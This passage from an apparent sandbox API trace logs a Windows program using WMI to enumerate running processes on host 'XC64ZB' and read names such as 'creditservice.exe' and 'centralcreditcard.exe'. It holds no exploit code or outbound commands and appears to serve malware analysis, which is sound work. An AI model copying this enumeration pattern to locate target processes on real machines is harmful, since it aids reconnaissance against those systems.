[1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.431] IUnknown:Release (This=0x601a94) returned 0x1 [0265.432] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba308) returned 0x0 [0265.432] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba308, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.432] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba308, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552ab68) returned 0x0 [0265.432] WbemDefPath:IUnknown:Release (This=0x54ba308) returned 0x0 [0265.432] WbemDefPath:IUnknown:QueryInterface (in: This=0x552ab68, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552ab68) returned 0x0 [0265.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x552ab68, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x552ab68, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.433] WbemDefPath:IUnknown:AddRef (This=0x552ab68) returned 0x3 [0265.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x552ab68, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x552ab68, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x552ab68, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x55372b8) returned 0x0 [0265.433] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55372b8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.433] WbemDefPath:IUnknown:Release (This=0x55372b8) returned 0x3 [0265.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x552ab68, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.433] WbemDefPath:IUnknown:Release (This=0x552ab68) returned 0x2 [0265.433] WbemDefPath:IUnknown:Release (This=0x552ab68) returned 0x1 [0265.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x552ab68, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552ab68) returned 0x0 [0265.433] WbemDefPath:IUnknown:AddRef (This=0x552ab68) returned 0x3 [0265.433] WbemDefPath:IUnknown:Release (This=0x552ab68) returned 0x2 [0265.433] WbemDefPath:IWbemPath:SetText (This=0x552ab68, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4456\"") returned 0x0 [0265.434] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.434] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.434] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.434] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.434] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.434] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.434] IWbemClassObject:Get (in: This=0x5539478, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23eb670*=0, plFlavor=0x23eb674*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="creditservice.exe", varVal2=0x0), pType=0x23eb670*=8, plFlavor=0x23eb674*=0) returned 0x0 [0265.434] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0265.434] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0265.434] IWbemClassObject:Get (in: This=0x5539478, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23eb670*=8, plFlavor=0x23eb674*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="creditservice.exe", varVal2=0x0), pType=0x23eb670*=8, plFlavor=0x23eb674*=0) returned 0x0 [0265.434] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0265.434] SysStringByteLen (bstr="creditservice.exe") returned 0x22 [0265.434] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.434] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x5539ad8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.435] IUnknown:QueryInterface (in: This=0x5539ad8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5539ad8) returned 0x0 [0265.435] IUnknown:QueryInterface (in: This=0x5539ad8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.435] IUnknown:QueryInterface (in: This=0x5539ad8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.435] IUnknown:QueryInterface (in: This=0x5539ad8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.435] IUnknown:AddRef (This=0x5539ad8) returned 0x3 [0265.435] IUnknown:QueryInterface (in: This=0x5539ad8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.436] IUnknown:QueryInterface (in: This=0x5539ad8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.436] IUnknown:QueryInterface (in: This=0x5539ad8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5539adc) returned 0x0 [0265.436] IMarshal:GetUnmarshalClass (in: This=0x5539adc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.436] IUnknown:Release (This=0x5539adc) returned 0x3 [0265.436] IUnknown:QueryInterface (in: This=0x5539ad8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.436] IUnknown:Release (This=0x5539ad8) returned 0x2 [0265.436] IUnknown:QueryInterface (in: This=0x5539ad8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5539ad8) returned 0x0 [0265.436] IUnknown:AddRef (This=0x5539ad8) returned 0x4 [0265.436] IUnknown:Release (This=0x5539ad8) returned 0x3 [0265.436] IUnknown:Release (This=0x5539ad8) returned 0x2 [0265.436] CoTaskMemFree (pv=0x54ba2d8) [0265.436] IUnknown:AddRef (This=0x5539ad8) returned 0x3 [0265.436] IWbemClassObject:Get (in: This=0x5539ad8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.436] IWbemClassObject:Get (in: This=0x5539ad8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4464\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.436] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4464\"") returned 0x5e [0265.436] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4464\"") returned 0x5e [0265.436] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.437] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.437] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.437] IUnknown:Release (This=0x601a94) returned 0x1 [0265.437] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.437] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.438] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552aa18) returned 0x0 [0265.438] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.438] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa18, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552aa18) returned 0x0 [0265.438] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa18, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.438] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa18, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.438] WbemDefPath:IUnknown:AddRef (This=0x552aa18) returned 0x3 [0265.438] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa18, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.438] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa18, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.438] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa18, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5537330) returned 0x0 [0265.438] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5537330, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.438] WbemDefPath:IUnknown:Release (This=0x5537330) returned 0x3 [0265.438] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa18, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.438] WbemDefPath:IUnknown:Release (This=0x552aa18) returned 0x2 [0265.438] WbemDefPath:IUnknown:Release (This=0x552aa18) returned 0x1 [0265.438] WbemDefPath:IUnknown:QueryInterface (in: This=0x552aa18, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552aa18) returned 0x0 [0265.438] WbemDefPath:IUnknown:AddRef (This=0x552aa18) returned 0x3 [0265.438] WbemDefPath:IUnknown:Release (This=0x552aa18) returned 0x2 [0265.439] WbemDefPath:IWbemPath:SetText (This=0x552aa18, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4464\"") returned 0x0 [0265.439] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.439] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.439] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.439] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.439] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.439] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.439] IWbemClassObject:Get (in: This=0x5539ad8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ebf14*=0, plFlavor=0x23ebf18*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="centralcreditcard.exe", varVal2=0x0), pType=0x23ebf14*=8, plFlavor=0x23ebf18*=0) returned 0x0 [0265.439] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0265.439] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0265.439] IWbemClassObject:Get (in: This=0x5539ad8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ebf14*=8, plFlavor=0x23ebf18*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="centralcreditcard.exe", varVal2=0x0), pType=0x23ebf14*=8, plFlavor=0x23ebf18*=0) returned 0x0 [0265.439] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0265.439] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0265.440] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.440] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x5539e08, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.442] IUnknown:QueryInterface (in: This=0x5539e08, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5539e08) returned 0x0 [0265.442] IUnknown:QueryInterface (in: This=0x5539e08, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.442] IUnknown:QueryInterface (in: This=0x5539e08, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.442] IUnknown:QueryInterface (in: This=0x5539e08, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.443] IUnknown:AddRef (This=0x5539e08) returned 0x3 [0265.443] IUnknown:QueryInterface (in: This=0x5539e08, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.443] IUnknown:QueryInterface (in: This=0x5539e08, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.443] IUnknown:QueryInterface (in: This=0x5539e08, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5539e0c) returned 0x0 [0265.443] IMarshal:GetUnmarshalClass (in: This=0x5539e0c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.443] IUnknown:Release (This=0x5539e0c) returned 0x3 [0265.443] IUnknown:QueryInterface (in: This=0x5539e08, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.443] IUnknown:Release (This=0x5539e08) returned 0x2 [0265.443] IUnknown:QueryInterface (in: This=0x5539e08, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5539e08) returned 0x0 [0265.443] IUnknown:AddRef (This=0x5539e08) returned 0x4 [0265.443] IUnknown:Release (This=0x5539e08) returned 0x3 [0265.444] IUnknown:Release (This=0x5539e08) returned 0x2 [0265.444] CoTaskMemFree (pv=0x54ba2d8) [0265.444] IUnknown:AddRef (This=0x5539e08) returned 0x3 [0265.444] IWbemClassObject:Get (in: This=0x5539e08, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.444] IWbemClassObject:Get (in: This=0x5539e08, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 